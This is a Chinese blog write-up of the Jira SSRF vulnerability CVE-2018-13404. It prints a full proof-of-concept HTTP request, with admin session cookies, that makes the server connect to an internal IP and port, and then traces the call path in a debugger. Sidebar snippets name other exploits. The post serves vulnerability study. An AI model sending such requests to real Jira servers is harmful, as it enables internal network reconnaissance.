CVE-2018-13404:[Jira]VerifyPopServerConnection功能SSRF

最新推荐文章于 2022-07-07 18:12:24 发布
最新推荐文章于 2022-07-07 18:12:24 发布
阅读量942 收藏
点赞数
分类专栏: java Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/89923922
版权
Web 同时被 2 个专栏收录
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

来源:https://jira.atlassian.com/browse/JRASERVER-68527
描述为:

allows remote attackers who have administrator rights to determine the existence of internal hosts & open ports and in some cases obtain service information from internal network resources via a Server Side Request Forgery (SSRF) vulnerability

由于需要管理员权限才能利用,危害较低,只有4分:
在这里插入图片描述
在这里插入图片描述

POST /secure/admin/VerifySmtpServerConnection!add.jspa HTTP/1.1
Host: cqq.com:8091
Content-Length: 300
Cache-Control: max-age=0
Origin: http://cqq.com:8091
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3760.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://cqq.com:8091/secure/admin/AddSmtpMailServer!default.jspa
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=909f8912-966b-4146-845c-bd4afbb342a9; JSESSIONID.a8dacec0=40k4rm1bg41cq0iz0pk06mw; screenResolution=1680x1050; jenkins-timestamper-offset=-28800000; JSESSIONID.ea565973=node0gs7qzwbwbve61rkcov30n71s56.node0; JSESSIONID.7fff2687=node0qm94g8n471v01guwzr3cy7gur6.node0; JSESSIONID.97de572c=1sd5yqku2s4amea1xvrtr6t8q; pgv_info=ssid=s2748431704; pgv_pvid=2487547493; ts_uid=9932210140; ADMINCONSOLESESSION=n1FCcBGb0SJfNrcMQhps1LXycQWMpvVhwQKn123nzbs1xqS6hbvf!1714415663; atlassian.xsrf.token=BBAN-C0N2-UEHO-M2OJ_7978bcc6c6a3a10bcc73fd8d695f73c34f82fb40_lin; AJS.conglomerate.cookie="|hipchat.inapp.links.first.clicked.cqq=false"; JSESSIONID=F2B9D75D0B3108F1E70D18CD81CFBD28
Connection: close

name=testSMTP&description=testSMTP&from=admin%40cqq.com&prefix=mdl_&serviceProvider=custom&protocol=smtp&serverName=192.168.170.139&port=4444&timeout=10000&username=cqq&changePassword=true&password=cqq&jndiLocation=&type=smtp&atl_token=BBAN-C0N2-UEHO-M2OJ_7978bcc6c6a3a10bcc73fd8d695f73c34f82fb40_lin

若不提供管理员Cookie无法利用:
在这里插入图片描述

参考了一下jira的开发文档,知道了一般url后缀对应的是do某方法,然后url前面的是对应的Java的类,所以可以在
atlassian-jira-software-7.13.0-standalone/atlassian-jira/WEB-INF/atlassian-bundled-plugins/jira-mail-plugin-10.0.13.jar!/com/atlassian/jira/plugins/mail/webwork/VerifySmtpServerConnection#doAdd
下断点。

调用栈如下:
在这里插入图片描述
最终调用atlassian-jira-software-7.13.0-standalone/atlassian-jira/WEB-INF/atlassian-bundled-plugins/base-hipchat-integration-plugin-7.10.3.jar!/javax/mail/Service#connect调用这一句:

connected = this.protocolConnect(host, port, user, password);

参考:https://docs.oracle.com/javaee/7/api/javax/mail/Service.html#connect-java.lang.String-int-java.lang.String-java.lang.String-
在这里插入图片描述
完成TCP请求.

caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
View 5部署之六:Connection Server安装与配置
匆匆走过不留痕迹
10-27 8360
摘要:View Connection Server是VMware View虚拟桌面管理体系中的重要组成部分,与vCenter Server和Composer通力合作,实现对虚拟桌面的管理。 内容: View Connection Server简介;安装View Connection Server;配置View Connection Server。 注意:安装之前先为服务器分配固定
Jira未授权SSRF漏洞(CVE-2019-8451)
Li-D的博客
12-31 1491
漏洞描述 Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。 漏洞危害 远程攻击者可以利用此漏洞以Jira服务端的身份访问内网资源。 漏洞影响版本 Jira < 8.4.0 漏洞分析 两个关键信息点: • 漏洞点在/plugins/servlet/gadgets/makeRequest • 原因在
框架分析--server、connector等组件与客户端通信
疯狂的程序员
03-25 1033
在这部分,主要介绍pomelo是如何与客户端通信以及前端服务器是如何处理用户请求的。处理客户端的请求和响应是pomelo的核心之一,它涉及到了很多组件,包括session组件,server组件,connection组件,connector组件,proxy组件,remote组件等。在本部分,我们仅仅介绍与前端服务器相关的组件,以及他们的作用,对于rpc以及后端服务器以来的backendSession...
自建pop邮件服务器,POP是什么?怎样开通?
weixin_28893221的博客
07-29 3835
POP3是指接收邮件的服务器。有的邮件服务是POP3,而有的叫POP。 不同邮箱,各自的POP服务器地址也是不同的。在网易邮箱之间使用新建其他邮箱功能时,不论邮箱是否开通POP功能,都可成功进行新建其他邮箱操作。如果新建的是非网易邮箱,请确认您所添加的邮箱是否已开通了POP功能?系统下面是各类邮箱POP服务器的开通方式:接收邮件服务器(POP): pop.qq.com1、登录QQ邮箱,点“设置”,...
jira 入门
舒婷(Zoe)
11-07 2万+
·  1 JIRA简介   ·  1.1 概要介绍   ·      ·  JIRA 的生产者把JIRA定义为Professional Issue Tracker,即它是一个专业的问题跟踪管理的软件。这里的”问题”对应的英文单词是 Issue,所以含义比较广,包括 Bug,Task,Enhancement,Improvement等等跟软件开发相关的名词。跟踪管理即对问题的整 个生命周期进行记
CVE-2018-8120:CVE-2018-8120 Windows LPE攻击
05-16
CVE-2018-8120 CVE-2018-8120 Windows LPE攻击 同时支持x32和x64。 经过测试:Win7 x32,Win7 x64,Win2008 x32,Win2008 R2 x32,Win2008 R2 Datacenter x64,Win2008 Enterprise x64。 用法 CVE-2018-8120 ...
CVE-2018-3252:CVE-2018-3252-PoC
03-18
CVE-2018-3252-PoC 1.使用YSOSERIAL生成PoC 2.您应该知道目标weblogic服务器的USERNAME和PASSWORD 3.将有效载荷发送到URL POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1Host: 127.0.0.1:7001Accept...
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft ...
修复CVE-2019-3862漏洞
发现美的眼睛
05-11 2624
修复CVE-2019-3862漏洞 这个漏洞来自于libssh2中的,发现者是国外团队,在发现之初就已经提交上去。在公布漏洞时,该漏洞已经被修复,修复方式采用更新。 修复时,博客主查看了一下阿里云安全中心的修复方案和网上其它博客主的修复方案,都是使用yum对curl的更新。 # 如果yum update要使用的话,请注意linux内核也有可能会被更新 yum update # 更新curl命令,这篇博客文章发布时,修复漏洞的新版本是7.29.0 yum update curl # 查看一下当前
POP邮件服务器
技术改变生活
06-08 1007
/*****************************************************************************************************Program File Name: popserver.cppProgram Begin Date: 2007-4-16Program Description: A Simple pop3 se
Atlassian 修复Jira 中的完全读取SSRF漏洞
smellycat000的专栏
07-07 401
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Atlassian 公司的热门问题追踪和项目管理软件 Jira 易受一个服务器端请求伪造 (SSRF) 缺陷影响,在无需凭据的情况下即可遭滥用。Assetnote 公司的首席技术官兼创始人 Shubham Shah 在博客文章中指出,“根据Jira 实例的不同,有很多种方法可以在 Jira 上创建账户来利用该漏洞”,例如...
CVE-2019-8451(Jira未授权SSRF漏洞)
qq_41048303的博客
04-09 4707
CVE-2019-8451(Jira未授权SSRF漏洞) 1.漏洞概述 jira的/plugins/servlet/gadgets/makeRequest资源存在ssrf漏洞。 2.环境搭建 使用docker 进行搭建 docker pull cptactionhank/atlassian-jira:7.8.0 docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0 访问ip:8080进行安装jira,安装过程需
使用JIRA搭建企业问题跟踪系统.PART2(转)
weixin_30470643的博客
08-02 169
4系统配置 该部分主要以某公司对问题跟踪系统的需求作为案例,介绍如何根据实际需求,在JIRA中进行配置。本案例中涉及到缺陷跟踪和需求变更的跟踪管理两部分。 4.1 设置问题类型 问题来源 描述 缺陷(Default) 系统本身的错误 Improvement 在系统需求范围内,但是对表现/实现方式进行了改...
CVE-2019-8451: Jira SSRF
公众号shadow sock7
09-29 2048
开始一直没找到这个接口是在哪里调用的,后来偶然看了一下burp才知道,他的referer是: http://cqq.com:8091/plugins/servlet/gadgets/ifr?container=atlassian&mid=10003&country=US&lang=en&view=default&view-params=%7B%22writa...
CVE-2018-12613[远程文件包含漏洞]复现
L1ni01
12-01 2491
CVE-2018-12613[远程文件包含漏洞]复现 0x00漏洞介绍 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并
PopUpWindow使用详解(一)——基本使用
热门推荐
启舰
10-20 17万+
前言:不要嫌前进的慢,只要一直在前进就好。 相关文章: 1、《PopUpWindow使用详解(一)——基本使用》 2、《PopUpWindow使用详解(二)——进阶及答疑》 有同学讲到想要知道PopUpWindow的知识,这里就给大家讲一讲PopUpWindow的基本用法和原理吧。这段时间博客可能会更新比较慢,因为你懂的 !!-_- ,往左看公告,嘿嘿。 先看一下我们要做的效果...
CVE-2019-11581 Atlassian Jira未授权服务端模板注入漏洞
公众号shadow sock7
07-17 2582
https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw
利用CVE-2018-12613漏洞:远程文件包含与加固教程
"E042-服务漏洞利用及加固-利用CVE-2018-12613漏洞实现远程文件包含" 本课程主要关注网络安全中的一个具体实例,即如何利用CVE-2018-12613漏洞进行远程文件包含攻击,并介绍相应的加固方法。CVE-2018-12613是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值